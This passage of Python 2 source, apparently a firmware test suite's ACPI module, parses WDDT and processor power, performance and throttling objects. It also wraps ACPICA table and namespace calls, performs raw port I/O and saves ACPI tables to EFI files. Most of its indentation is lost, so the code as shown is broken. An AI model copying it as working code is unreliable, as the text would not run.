return uefi_factory(data_len).from_address(addr)
parse_uefi = make_compat_parser("UEFI")
_wdt_available_decode = {
0: 'permanently disabled',
1: 'available',
}
_wdt_active_decode = {
0: 'WDT stopped when BIOS hands off control',
    1: 'WDT running when BIOS hands off control',
}
_ownership_decode = {
0: 'TCO is owned by the BIOS',
1: 'TCO is owned by the OS',
}
class wddt_status_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('wdt_available', ctypes.c_uint16, 1),
('wdt_active', ctypes.c_uint16, 1),
('ownership', ctypes.c_uint16, 1),
('reserved', ctypes.c_uint16, 8),
('user_reset_event', ctypes.c_uint16, 1),
('wdt_event', ctypes.c_uint16, 1),
('power_fail_event', ctypes.c_uint16, 1),
('unknown_reset_event', ctypes.c_uint16, 1),
]
_formats = {
'wdt_available': unpack.format_table("{}", _wdt_available_decode),
'wdt_active': unpack.format_table("{}", _wdt_active_decode),
'ownership': unpack.format_table("{}", _ownership_decode),
}
class wddt_status(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', wddt_status_bits),
]
class wddt_capability_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('auto_reset', ctypes.c_uint16, 1),
('alert_support', ctypes.c_uint16, 1),
('platform_directed_shutdown', ctypes.c_uint16, 1),
('immediate_shutdown', ctypes.c_uint16, 1),
('bios_handoff_support', ctypes.c_uint16, 1),
]
class wddt_capability(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', wddt_capability_bits),
]
class WDDT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('tco_spec_version', ctypes.c_uint16),
('tco_description_table_version', ctypes.c_uint16),
('pci_vid', ctypes.c_uint16),
('tco_base_address', GAS),
('timer_min_count', ctypes.c_uint16),
('timer_max_count', ctypes.c_uint16),
('timer_count_period', ctypes.c_uint16),
('status', wddt_status),
('capability', wddt_capability),
]
def WDDT(val):
"""Create class based on decode of an WDDT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return WDDT_v1.from_buffer_copy(data)
return WDDT_v1.from_address(addr)
parse_wddt = make_compat_parser("WDDT")
def get_cpupaths(*args):
cpupaths, devpaths = _acpi._cpupaths(*args)
apic = parse_apic()
procid_apicid = apic.procid_apicid
uid_x2apicid = apic.uid_x2apicid
if procid_apicid is None or uid_x2apicid is None:
# No APIC table exists, so assume the existing cpus are enabled
return cpupaths
enabled_cpupaths = []
for cpupath in cpupaths:
procdef = evaluate(cpupath)
if procdef is not None and procdef.ProcId in procid_apicid:
enabled_cpupaths.append(cpupath)
for devpath in devpaths:
uid = evaluate(devpath + "._UID")
if uid is not None and uid in uid_x2apicid:
enabled_cpupaths.append(devpath)
return enabled_cpupaths
def find_procid():
cpupaths = get_cpupaths()
cpupath_procid = {}
for cpupath in cpupaths:
if get_object_info(cpupath).object_type != ACPI_TYPE_PROCESSOR:
continue
processor = evaluate(cpupath)
if processor is not None:
cpupath_procid[cpupath] = processor.ProcId
else:
cpupath_procid[cpupath] = None
return OrderedDict(sorted(cpupath_procid.items()))
def find_uid():
cpupaths = get_cpupaths()
cpupath_uid = {}
for cpupath in cpupaths:
if get_object_info(cpupath).object_type != ACPI_TYPE_DEVICE:
continue
value = evaluate(cpupath + "._UID")
cpupath_uid[cpupath] = value
return OrderedDict(sorted(cpupath_uid.items()))
def commonprefix(l):
"""Return the common prefix of a list of strings."""
if not l:
return ''
prefix = l[0]
for s in l[1:]:
        for i, c in enumerate(prefix):
            if i >= len(s) or c != s[i]:
                prefix = s[:i]
                break
return prefix
def factor_commonprefix(l):
if not l:
return ''
if len(l) == 1:
return l[0]
prefix = commonprefix(l)
prefixlen = len(prefix)
return prefix + "{" + ", ".join([s[prefixlen:] for s in l]) + "}"
def display_cpu_info():
cpupaths = get_cpupaths()
cpupath_procid = find_procid()
cpupath_uid = find_uid()
apic = parse_apic()
procid_apicid = apic.procid_apicid
uid_x2apicid = apic.uid_x2apicid
if procid_apicid is None or uid_x2apicid is None:
return
socketindex_cpuscope = {}
s = factor_commonprefix(cpupaths) + '\n'
for cpupath in cpupaths:
s += '\n' + cpupath
def socket_str(apicid):
socket_index = bits.socket_index(apicid)
if socket_index is None:
return ''
return ', socketIndex=0x%02x' % socket_index
def apicid_str(apicid):
if apicid is None:
return 'no ApicID'
return 'ApicID=0x%02x%s' % (apicid, socket_str(apicid))
procid = cpupath_procid.get(cpupath, None)
if procid is not None:
s += ' ProcID=%-2u (%s) ' % (procid, apicid_str(procid_apicid.get(procid, None)))
socketindex_cpuscope.setdefault(bits.socket_index(procid_apicid.get(procid, None)), []).append(scope(cpupath))
uid = cpupath_uid.get(cpupath, None)
if uid is not None:
s += ' _UID=%s (%s)' % (uid, apicid_str(uid_x2apicid.get(uid, None)))
socketindex_cpuscope.setdefault(bits.socket_index(uid_x2apicid.get(uid, None)), []).append(scope(cpupath))
for value, scopes in socketindex_cpuscope.iteritems():
unique_scopes = set(scopes)
s += '\nsocket {0} contains {1} processors and {2} ACPI scope: {3}\n'.format(value, len(scopes), len(unique_scopes), ','.join(sorted(unique_scopes)))
ttypager.ttypager_wrap(s, indent=False)
def display_acpi_method(method, print_one):
"""Helper function that performs all basic processing for evaluating an ACPI method"""
cpupaths = get_cpupaths()
uniques = {}
for cpupath in cpupaths:
value = evaluate(cpupath + "." + method)
uniques.setdefault(value, []).append(cpupath)
print ttypager._wrap("%u unique %s values" % (len(uniques), method))
for value, cpupaths in sorted(uniques.iteritems(), key=(lambda (k,v): v)):
print
print ttypager._wrap(factor_commonprefix(cpupaths))
if value is None:
print "No %s found for these CPUs" % method
else:
print_one(value)
def parse_cpu_method(method):
cls = globals()["parse" + string.lower(method)]
cpupaths = get_cpupaths()
uniques = {}
for cpupath in cpupaths:
value = evaluate(cpupath + "." + method)
if value is not None:
obj = cls(value)
else:
obj = None
uniques.setdefault(obj, []).append(cpupath)
return uniques
def display_cpu_method(method):
uniques = parse_cpu_method(method)
lines = [ttypager._wrap("{} unique {} values".format(len(uniques), method))]
for value, cpupaths in sorted(uniques.iteritems(), key=(lambda (k,v): v)):
lines.append("")
lines.append(ttypager._wrap(factor_commonprefix(cpupaths)))
        if value is None:
lines.append("No {} found for these CPUs".format(method))
elif ctypes.sizeof(value) == 0:
lines.append("No {} found for these CPUs".format(method))
else:
lines.extend(ttypager._wrap(str(value), indent=False).splitlines())
ttypager.ttypager("\n".join(lines))
def _CSD_factory(num_dependencies):
class CStateDependency(bits.cdata.Struct):
"""C-State Dependency"""
_pack_ = 1
_fields_ = [
('num_entries', ctypes.c_uint32),
('revision', ctypes.c_uint8),
('domain', ctypes.c_uint32),
('coordination_type', ctypes.c_uint32),
('num_processors', ctypes.c_uint32),
('index', ctypes.c_uint32),
]
_formats = {
'coordination_type': unpack.format_table("{:#x}", _coordination_types)
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _CSD(bits.cdata.Struct):
        _pack_ = 1
_fields_ = [
('CStateDependencies', CStateDependency * num_dependencies),
]
return _CSD
def parse_csd(dependencies):
"""Parse C-State Dependency"""
    return _CSD_factory(len(dependencies))(dependencies)
class CState(bits.cdata.Struct):
"""Processor Power States (CStates)"""
_pack_ = 1
_fields_ = [
('register', SingleRegister),
('type', ctypes.c_uint8),
('latency', ctypes.c_uint16),
('power', ctypes.c_uint32),
]
_formats = {
'type': lambda x: "C{}".format(x),
'latency': lambda x: "{} us".format(x),
'power': lambda x: "{} mW".format(x),
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
def make_CStates(data):
if data is None:
return None
if isinstance(data, tuple):
if len(data) == 4:
if isinstance(data[0], SingleRegister):
return CState(*data)
return tuple(make_CStates(v) for v in data)
return data
def _CST_factory(num_cstates):
class _CST(bits.cdata.Struct):
        _pack_ = 1
_fields_ = [
('count', ctypes.c_uint32),
('CStates', CState * num_cstates),
]
return _CST
def parse_cst(cst_data):
"""Parse Processor Power States (_CST)"""
cst_data = make_resources(cst_data)
return _CST_factory(cst_data[0])(cst_data[0], cst_data[1:])
#if hasattr(cstate, 'FFH'):
# # Decode register as FFH
# if cstate.FFH.VendorCode == 0:
# desc += "C1 Halt"
# elif (cstate.FFH.VendorCode == 1) and (cstate.FFH.ClassCode == 1):
# desc += "C1 I/O then Halt I/O port address = {#x}".format(Register.Arg0)
# elif (cstate.FFH.VendorCode == 1) and (cstate.FFH.ClassCode == 2):
# desc += "MWAIT {:#02x} ({})".format(cstate.FFH.Arg0, cpulib.mwait_hint_to_cstate(cstate.FFH.Arg0))
# desc += " {} {}BMAvoid".format(("SWCoord", "HWCoord")[bool(cstate.FFH.Arg1 & 1)], ("!", "")[bool(cstate.FFH.Arg1 & (1 << 1))])
# lines.append("C{cstate_num:<d} {desc}".format(cstate_num=cstate_num, desc=desc))
#else:
# # Decode register as actual hardware resource
# lines.append(" {:11s} {:10s} {:9s} {:10s} {:8s}".format("AddrSpaceId", "BitWidth", "BitOffset", "AccessSize", "Address"))
# lines.append("C{cstate_num:<d} {r.AddressSpaceId:<#11x} {r.BitWidth:<#10x} {r.BitOffset:<#9x} {r.AccessSize:<#10x} {r.Address:<#8x}".format(cstate_num=cstate_num, r=cstate.register))
# Decode and print ACPI c-state, latency, & power
#lines.append(" ACPI C{c.type:<1d} latency={c.latency}us power={c.power}mW".format(c=cstate))
class _PCT(bits.cdata.Struct):
"""Performance Control"""
    _pack_ = 1
_fields_ = [
('control_register', SingleRegister),
('status_register', SingleRegister),
]
def parse_pct(pct_data):
"""Parse Performance Control"""
return _PCT(*make_resources(pct_data))
class _PDL(bits.cdata.Struct):
"""P-State Depth Limit"""
_pack_ = 1
_fields_ = [
('pstate_depth_limit', ctypes.c_uint32),
]
_formats = {
'pstate_depth_limit': (lambda x : "Lowest performance state that OSPM can use = {}".format(x)),
}
def parse_pdl(pdl_data):
"""Parse P-State Depth Limit"""
return _PDL(pdl_data)
class _PPC(bits.cdata.Struct):
"""Performance Present Capabilities"""
_pack_ = 1
_fields_ = [
('highest_pstate', ctypes.c_uint32),
]
_formats = {
'highest_pstate': (lambda x : "Highest performance state that OSPM can use = {}".format(x)),
}
def parse_ppc(ppc_data):
"""Parse Performance Present Capabilities"""
return _PPC(ppc_data)
_coordination_types = {
0xFC : 'SW_ALL',
0xFD : 'SW_ANY',
0xFE : 'HW_ALL',
}
def _PSD_factory(num_dependencies):
class PStateDependency(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('num_entries', ctypes.c_uint32),
('revision', ctypes.c_uint8),
('domain', ctypes.c_uint32),
('coordination_type', ctypes.c_uint32),
('num_processors', ctypes.c_uint32),
]
_formats = {
'coordination_type': unpack.format_table("{:#x}", _coordination_types)
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _PSD(bits.cdata.Struct):
        _pack_ = 1
_fields_ = [
('PStateDependencies', PStateDependency * num_dependencies),
]
return _PSD
def parse_psd(psd_data):
"""Parse P-State Dependency"""
return _PSD_factory(len(psd_data))(psd_data)
def _PSS_factory(num_pstates):
class PState(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('core_frequency', ctypes.c_uint32),
('power', ctypes.c_uint32),
('latency', ctypes.c_uint32),
('bus_master_latency', ctypes.c_uint32),
('control', ctypes.c_uint32),
('status', ctypes.c_uint32),
]
_formats = {
'core_frequency': lambda x: "{} MHz".format(x),
'power': lambda x: "{} mW".format(x),
'latency': lambda x: "{} us".format(x),
'bus_master_latency': lambda x: "{} us".format(x),
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _PSS(bits.cdata.Struct):
        _pack_ = 1
_fields_ = [
('pstates', PState * num_pstates),
]
return _PSS
def parse_pss(pstates):
"""Parse Performance Supported States"""
return _PSS_factory(len(pstates))(pstates)
class _PTC(bits.cdata.Struct):
"""Processor Throttling Control"""
    _pack_ = 1
_fields_ = [
('control_register', SingleRegister),
('status_register', SingleRegister),
]
def parse_ptc(ptc_data):
"""Parse Processor Throttling Control"""
return _PTC(*make_resources(ptc_data))
class _TDL(bits.cdata.Struct):
"""T-State Depth Limit"""
_pack_ = 1
_fields_ = [
('lowest_tstate', ctypes.c_uint32),
]
_formats = {
'lowest_tstate': (lambda x : "Lowest throttling state that OSPM can use = {}".format(x)),
}
def parse_tdl(tdl_data):
"""Parse T-State Depth Limit"""
return _TDL(tdl_data)
class _TPC(bits.cdata.Struct):
"""Throttling Present Capabilities"""
_pack_ = 1
_fields_ = [
('highest_tstate', ctypes.c_uint32),
]
_formats = {
'highest_tstate': (lambda x : "Highest throttling state that OSPM can use = {}".format(x)),
}
def parse_tpc(tpc_data):
"""Parse Throttling Present Capabilities"""
return _TPC(tpc_data)
def _TSD_factory(num_dependencies):
class TStateDependency(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('num_entries', ctypes.c_uint32),
('revision', ctypes.c_uint8),
('domain', ctypes.c_uint32),
('coordination_type', ctypes.c_uint32),
('num_processors', ctypes.c_uint32),
]
_formats = {
'coordination_type': unpack.format_table("{:#x}", _coordination_types)
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _TSD(bits.cdata.Struct):
        _pack_ = 1
_fields_ = [
('TStateDependencies', TStateDependency * num_dependencies),
]
return _TSD
def parse_tsd(dependencies):
"""Parse T-State Dependency"""
return _TSD_factory(len(dependencies))(dependencies)
def _TSS_factory(num_tstates):
class TState(bits.cdata.Struct):
"""Throttling Supported States"""
_pack_ = 1
_fields_ = [
('percent', ctypes.c_uint32),
('power', ctypes.c_uint32),
('latency', ctypes.c_uint32),
('control', ctypes.c_uint32),
('status', ctypes.c_uint32),
]
_formats = {
'percent': lambda x: "{}%".format(x),
'power': lambda x: "{} mW".format(x),
'latency': lambda x: "{} us".format(x),
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _TSS(bits.cdata.Struct):
        _pack_ = 1
_fields_ = [
('TStates', TState * num_tstates),
]
return _TSS
def parse_tss(tss_data):
"""Parse Throttling Supported States"""
return _TSS_factory(len(tss_data))(tss_data)
def display_uid():
"""Find and display _UID"""
def print_uid(uid):
print "_UID = %s" % uid
display_acpi_method("_UID", print_uid)
_acpica_early_init = CFUNCTYPE(c_bool)(_acpi.acpica_early_init)
_acpica_init = CFUNCTYPE(c_bool)(_acpi.acpica_init)
def needs_early_init(f, docstring=""):
"""Wrap a function that requires minimal ACPICA table-parsing initialization"""
def acpica_early_init_wrapper(*args):
if not _acpica_early_init():
raise RuntimeError("ACPICA module failed minimal initialization.")
return f(*args)
acpica_early_init_wrapper.__doc__ = docstring
return acpica_early_init_wrapper
def needs_init(f, docstring=""):
"""Wrap a function that requires ACPICA initialization"""
def acpica_init_wrapper(*args):
if not _acpica_init():
raise RuntimeError("ACPICA module failed to initialize.")
return f(*args)
acpica_init_wrapper.__doc__ = docstring
return acpica_init_wrapper
AE_OK = 0
AE_BAD_PARAMETER = 0x1001
ACPI_HANDLE = c_void_p
ACPI_IO_ADDRESS = c_ulong
ACPI_OBJECT_TYPE = c_uint32
ACPI_SIZE = c_ulong
ACPI_STATUS = c_uint32
ACPI_STRING = c_char_p
UINT32 = c_uint32
ACPI_ALLOCATE_BUFFER = ACPI_SIZE(-1)
ACPI_ROOT_OBJECT = ACPI_HANDLE(-1)
ACPI_FULL_PATHNAME, ACPI_SINGLE_NAME = range(2)
class ACPI_BUFFER(bits.cdata.Struct):
_fields_ = (
("Length", ACPI_SIZE),
("Pointer", c_void_p),
)
ACPI_WALK_CALLBACK = CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, UINT32, c_void_p, POINTER(c_void_p))
terminate = CFUNCTYPE(None)(_acpi.acpica_terminate)
ACPI_FREE = CFUNCTYPE(None, c_void_p)(_acpi.ACPI_FREE)
AcpiFormatException = CFUNCTYPE(POINTER(c_char), ACPI_STATUS)(_acpi.AcpiFormatException)
class ACPIException(Exception):
def __str__(self):
s = string_at(AcpiFormatException(self.args[0]))
return "[Error {:#x}] {}".format(self.args[0], s)
def check_status(status):
"""Check an ACPI_STATUS value, and raise an exception if not successful
To check non-status values that may have the error bit set, use check_error_value instead."""
if status:
raise ACPIException(status)
acpi_unsafe_io = True
@CFUNCTYPE(ACPI_STATUS, ACPI_IO_ADDRESS, POINTER(UINT32), UINT32)
def AcpiOsReadPort(Address, Value, Width):
if Width == 8:
Value.contents.value = bits.inb(Address) if acpi_unsafe_io else 0xFF
elif Width == 16:
Value.contents.value = bits.inw(Address) if acpi_unsafe_io else 0xFFFF
elif Width == 32:
Value.contents.value = bits.inl(Address) if acpi_unsafe_io else 0xFFFFFFFF
else:
return AE_BAD_PARAMETER
return AE_OK
@CFUNCTYPE(ACPI_STATUS, ACPI_IO_ADDRESS, UINT32, UINT32)
def AcpiOsWritePort(Address, Value, Width):
if not acpi_unsafe_io:
return AE_OK
if Width == 8:
bits.outb(Address, Value)
elif Width == 16:
bits.outw(Address, Value)
elif Width == 32:
bits.outl(Address, Value)
else:
return AE_BAD_PARAMETER
return AE_OK
bits.set_func_ptr(_acpi.AcpiOsReadPort_ptrptr, AcpiOsReadPort)
bits.set_func_ptr(_acpi.AcpiOsWritePort_ptrptr, AcpiOsWritePort)
_AcpiGetHandle_docstring = """Get the object handle associated with an ACPI name"""
AcpiGetHandle = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, ACPI_STRING, POINTER(ACPI_HANDLE))(_acpi.AcpiGetHandle), _AcpiGetHandle_docstring)
_AcpiGetName_docstring = """Get the name of an ACPI object"""
AcpiGetName = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, UINT32, POINTER(ACPI_BUFFER))(_acpi.AcpiGetName), _AcpiGetName_docstring)
_AcpiGetObjectInfo_docstring = """Get info about an ACPI object"""
AcpiGetObjectInfo = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, POINTER(c_void_p))(_acpi.AcpiGetObjectInfo), _AcpiGetObjectInfo_docstring)
_AcpiGetTable_docstring = """Return table specified by the signature and instance"""
AcpiGetTable = needs_early_init(CFUNCTYPE(ACPI_STATUS, ACPI_STRING, UINT32, POINTER(POINTER(TableHeader)))(_acpi.AcpiGetTable), _AcpiGetTable_docstring)
_AcpiGetTableByIndex_docstring = """Return table specified by index"""
AcpiGetTableByIndex = needs_early_init(CFUNCTYPE(ACPI_STATUS, UINT32, POINTER(POINTER(TableHeader)))(_acpi.AcpiGetTableByIndex), _AcpiGetTableByIndex_docstring)
_AcpiOsGetRootPointer_docstring = """Return the address of the ACPI RSDP table"""
AcpiOsGetRootPointer = needs_init(CFUNCTYPE(c_ulong)(_acpi.AcpiOsGetRootPointer), _AcpiOsGetRootPointer_docstring)
_AcpiInstallInterface_docstring = """Install an interface into the _OSI method"""
AcpiInstallInterface = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_STRING)(_acpi.AcpiInstallInterface), _AcpiInstallInterface_docstring)
_AcpiLoadTable_docstring = """Load an SSDT table binary into the ACPI namespace"""
AcpiLoadTable = needs_init(CFUNCTYPE(ACPI_STATUS, POINTER(TableHeader))(_acpi.AcpiLoadTable), _AcpiLoadTable_docstring)
_AcpiRemoveInterface_docstring = """Remove an interface from the _OSI method."""
AcpiRemoveInterface = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_STRING)(_acpi.AcpiRemoveInterface), _AcpiRemoveInterface_docstring)
_AcpiSubsystemStatus_docstring = """Get ACPI subsystem status"""
AcpiSubsystemStatus = needs_init(CFUNCTYPE(ACPI_STATUS)(_acpi.AcpiSubsystemStatus), _AcpiSubsystemStatus_docstring)
_AcpiWalkNamespace_docstring = """Walk the ACPI namespace with callbacks"""
AcpiWalkNamespace = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_OBJECT_TYPE, ACPI_HANDLE, UINT32, ACPI_WALK_CALLBACK, ACPI_WALK_CALLBACK, c_void_p, POINTER(c_void_p))(_acpi.AcpiWalkNamespace), _AcpiWalkNamespace_docstring)
def get_object_info(pathname):
"""Get object information for an ACPI object."""
handle = ACPI_HANDLE()
check_status(AcpiGetHandle(None, pathname, byref(handle)))
assert handle
info = c_void_p()
check_status(AcpiGetObjectInfo(handle, byref(info)))
assert info
try:
length = c_uint32.from_address(info.value).value
buf = create_string_buffer(length)
memmove(buf, info, length)
finally:
ACPI_FREE(info)
return ObjectInfo(buf.raw, info.value)
def get_objpaths(objectname, depth=(2**32-1)):
"""Return a list of names of ACPI objects matching objectname
If depth is specified, search only that deep in the namespace."""
l = []
@ACPI_WALK_CALLBACK
def callback(handle, nesting_level, context, return_value):
buf = ACPI_BUFFER(ACPI_ALLOCATE_BUFFER, None)
status = AcpiGetName(handle, ACPI_FULL_PATHNAME, byref(buf))
if status:
print "AcpiGetName:", ACPIException(status)
return 0
name = string_at(buf.Pointer)
ACPI_FREE(buf.Pointer)
if objectname in name:
l.append(name)
return 0
null_callback = ACPI_WALK_CALLBACK(0)
check_status(AcpiWalkNamespace(ACPI_TYPE_ANY, ACPI_ROOT_OBJECT, depth, callback, null_callback, None, None))
return l
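# Example (illustrative; the actual paths depend on the platform's namespace):
#   get_objpaths("_HID")        # every object path containing "_HID"
#   get_objpaths("\\_PR_.")     # objects under the \_PR_ processor scope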
def install_interface(name):
check_status(AcpiInstallInterface(name))
def get_rsdt_addr():
"""Return the address of the RSDT"""
return RSDP(AcpiOsGetRootPointer()).rsdt_address
def get_xsdt_addr():
"""Return the address of the XSDT
    Returns None if the RSDP does not point to an XSDT; raises RuntimeError if
    the XSDT lives above 4GB when running in 32-bit mode."""
rsdp = RSDP(AcpiOsGetRootPointer())
try:
xsdt = rsdp.xsdt_address
except AttributeError as e:
return None
if sizeof(c_void_p) == 4 and xsdt >= 2**32:
raise RuntimeError("XSDT located above 4G; cannot access on 32-bit")
return xsdt
def get_table(signature, instance=1):
"""Get the requested ACPI table based on signature"""
if signature in ('RSDP', 'RSD PTR', 'RSD PTR '):
if instance == 1:
rsdp_addr = AcpiOsGetRootPointer()
rsdp = RSDP(rsdp_addr)
return string_at(rsdp_addr, sizeof(rsdp))
return None
addr = get_table_addr(signature, instance)
if addr is None:
return None
header = TableHeader.from_address(addr)
return string_at(addr, header.length)
def get_table_addr(signature, instance=1):
"""Get the requested ACPI table address based on signature"""
special_get = {
'RSDP': AcpiOsGetRootPointer,
'RSD PTR': AcpiOsGetRootPointer,
'RSD PTR ': AcpiOsGetRootPointer,
'RSDT': get_rsdt_addr,
'XSDT': get_xsdt_addr,
}.get(signature)
if special_get is not None:
if instance == 1:
return special_get()
return None
header = POINTER(TableHeader)()
if AcpiGetTable(signature, instance, byref(header)):
return None
return addressof(header.contents)
def get_table_by_index(index):
"""Get ACPI table based on an index in the root table"""
header = POINTER(TableHeader)()
if AcpiGetTableByIndex(index, byref(header)):
return None
return string_at(addressof(header.contents), header.contents.length)
def get_table_addr_by_index(index):
"""Get ACPI table address based on an index in the root table"""
header = POINTER(TableHeader)()
if AcpiGetTableByIndex(index, byref(header)):
return None
return addressof(header.contents)
def get_table_list():
"""Get the list of ACPI table signatures"""
tableptrs = itertools.chain(itertools.ifilter(bool, (get_table_addr_by_index(index) for index in range(3))),
itertools.takewhile(bool, (get_table_addr_by_index(index) for index in itertools.count(start=3))))
signatures = [(ctypes.c_char * 4).from_address(ptr).value for ptr in tableptrs]
signatures.extend([s for s in ['RSDP', 'RSDT', 'XSDT'] if get_table_addr(s)])
signatures = sorted(set(signatures))
return signatures
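# Example (illustrative output; the exact set depends on the firmware):
#   get_table_list()  ->  ['APIC', 'DSDT', 'FACP', 'FACS', 'HPET', 'RSDP', 'RSDT', 'SSDT', 'XSDT']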
def load_table(table_data):
"""Load an SSDT table binary into the ACPI namespace
Usage: acpi.load_table(table_data) where table_data contains an ACPI SSDT
(including header). The contents of the SSDT can be used to either patch
existing or add new ACPI methods or data for debug purposes.
Example usage steps:
- Create an SSDT ASL source file.
- Compile to generate a binary image (AML) file.
- Include the SSDT's AML binary file on the BITS disk or ISO image.
- Load the SSDT AML binary file into the ACPI namespace, with:
acpi.load_table(open("/ssdt.aml").read())"""
buf = create_string_buffer(table_data, len(table_data))
check_status(AcpiLoadTable(cast(buf, POINTER(TableHeader))))
def display_objects(name="\\", depth=0xffffffff):
s = ""
for path in get_objpaths(name, depth):
s += "{} ({})\n".format(path, acpi_object_types.get(get_object_info(path).object_type, "Reserved"))
ttypager.ttypager_wrap(s, indent=False)
def dump(name="", depth=0xffffffff):
s = ''
for path in get_objpaths(name, depth):
s += ttypager._wrap('{} : {!r}'.format(path, evaluate(path))) + '\n'
return s
def dumptable(name="", instance=1):
"""Dump hexadecimal and printable ASCII bytes for an ACPI table specified by 4CC and instance"""
s = ''
data = get_table(name, instance)
if data is None:
s += "ACPI table with signature of {} and instance of {} not found.\n".format(name, instance)
return s
s += bits.dumpmem(data)
return s
def dumptables():
"""Dump hexdecimal and printable ASCII bytes for all ACPI tables"""
s = ''
for signature in get_table_list():
for instance in itertools.count(1):
data = get_table(signature, instance)
if data is None:
break
s += "ACPI Table {} instance {}\n".format(signature, instance)
s += bits.dumpmem(data)
return s
created_explore_acpi_tables_cfg = False
def create_explore_acpi_tables_cfg():
global created_explore_acpi_tables_cfg
if created_explore_acpi_tables_cfg:
return
cfg = ""
try:
import efi
cfg += 'menuentry "Save all ACPI tables (raw and decoded) to files" {\n'
cfg += ' echo "Saving all ACPI tables (raw and decoded) to files..."\n'
cfg += " py 'import acpi'\n"
cfg += " py 'acpi.efi_save_tables()'\n"
cfg += ' echo "Done."\n'
cfg += " py 'from bits import pause ; pause.pause()'\n"
cfg += '}\n\n'
cfg += 'menuentry "Save all ACPI tables (raw only) to files" {\n'
cfg += ' echo "Saving all ACPI tables (raw only) to files..."\n'
cfg += " py 'import acpi'\n"
cfg += " py 'acpi.efi_save_tables(decode=False)'\n"
cfg += ' echo "Done."\n'
cfg += " py 'from bits import pause ; pause.pause()'\n"
cfg += '}\n\n'
except:
cfg += 'menuentry "Dump all ACPI tables to log only" {\n'
cfg += ' echo "Dumping ACPI tables to log..."\n'
cfg += " py 'import acpi, bits, redirect'\n"
cfg += " py 'with redirect.logonly(): print acpi.dumptables()'\n"
cfg += ' echo "Done."\n'
cfg += " py 'from bits import pause ; pause.pause()'\n"
cfg += '}\n\n'
for signature in get_table_list():
for instance in itertools.count(1):
if get_table_addr(signature, instance) is None:
break
            parse_method = 'parse_{}'.format(string.rstrip(str.lower(signature), "!"))
if parse_method in globals():
cfg += 'menuentry "Decode {} Instance {}" {{\n'.format(signature, instance)
cfg += ' py "import acpi ; acpi.{}(printflag=True, instance={})"\n'.format(parse_method, instance)
cfg += '}\n\n'
if signature in ("APIC", "SRAT"):
cfg += 'menuentry "Decode {} Instance {} (enabled only)" {{\n'.format(signature, instance)
cfg += ' py "import acpi ; acpi.{}(EnabledOnly=True, instance={})"\n'.format(parse_method, instance)
cfg += '}\n\n'
cfg += 'menuentry "Dump {} Instance {} raw" {{\n'.format(signature, instance)
cfg += """ py 'import ttypager, acpi; ttypager.ttypager(acpi.dumptable("{}", {}))'\n""".format(signature, instance)
cfg += '}\n'
bits.pyfs.add_static("explore_acpi_tables.cfg", cfg)
created_explore_acpi_tables_cfg = True
created_explore_acpi_cpu_methods_cfg = False
def create_explore_acpi_cpu_methods_cfg():
global created_explore_acpi_cpu_methods_cfg
if created_explore_acpi_cpu_methods_cfg:
return
methods = set()
for c in get_cpupaths():
for o in get_objpaths(c + "."):
method = o[len(c)+1:]
if "." in method:
continue
methods.add(method)
cfg = ""
for method in sorted(methods):
# Whitelist for now until splitting this into its own module
if method in ("_CSD", "_CST", "_MAT", "PDL", "_PPC", "_PCT", "_PTC", "_PSD", "_PSS", "_TDL", "_TPC", "_TSD", "_TSS"):
parse_method = 'parse' + string.lower(method)
cfg += 'menuentry "{} ({})" {{\n'.format(method, globals()[parse_method].__doc__)
cfg += """ py 'import acpi ; acpi.display_cpu_method("{}")'\n""".format(method)
cfg += '}\n'
bits.pyfs.add_static("explore_acpi_cpu_methods.cfg", cfg)
created_explore_acpi_cpu_methods_cfg = True
def show_checksum(signature, instance=1):
"""Compute checksum of ACPI table"""
data = get_table(signature, instance)
if data is None:
print "ACPI table with signature of {} and instance of {} not found.\n".format(signature, instance)
return
csum = sum(ord(c) for c in data)
print 'Full checksum is {:#x}'.format(csum)
print '1-byte checksum is {:#x}'.format(csum & 0xff)
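# Note: per the ACPI specification the checksum byte is chosen so that all
# bytes of a table sum to zero modulo 0x100, so for example
#   show_checksum("FACP")
# should report a 1-byte checksum of 0x0 on a correctly checksummed table.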
try:
import efi
def efi_save_tables(decode=True):
"""Save all ACPI tables to files; only works under EFI.
Warning: All files in the /acpi directory will be deleted!"""
root = efi.get_boot_fs()
acpidir = root.mkdir("acpi")
# delete all files in \acpi directory
if "acpi" in os.listdir("/"):
print "Deleting old files..."
for f in os.listdir("/acpi"):
print "Deleting {}...".format(f),
acpidir.open(f, efi.EFI_FILE_MODE_READ | efi.EFI_FILE_MODE_WRITE).delete()
print "Done"
address_list = ''
for signature in get_table_list():
for instance in itertools.count(1):
data = get_table(signature, instance)
if data is None:
break
basename = signature
if instance > 1:
basename += "{}".format(instance)
fname = "{}.bin".format(basename)
print "Saving {}...".format(fname),
acpidir.create(fname).write(data)
print "Done"
address = get_table_addr(signature, instance)
address_list += "{:5}: {:#x}\n".format(basename, address)
                parse_method = 'parse_{}'.format(string.rstrip(str.lower(signature), "!"))
if (decode == True) and (parse_method in globals()):
data = "{} address = {:#x}\n".format(basename, address)
data += str(parse_table(signature, instance))
fname = "{}.txt".format(basename)
print "Saving {}...".format(fname),
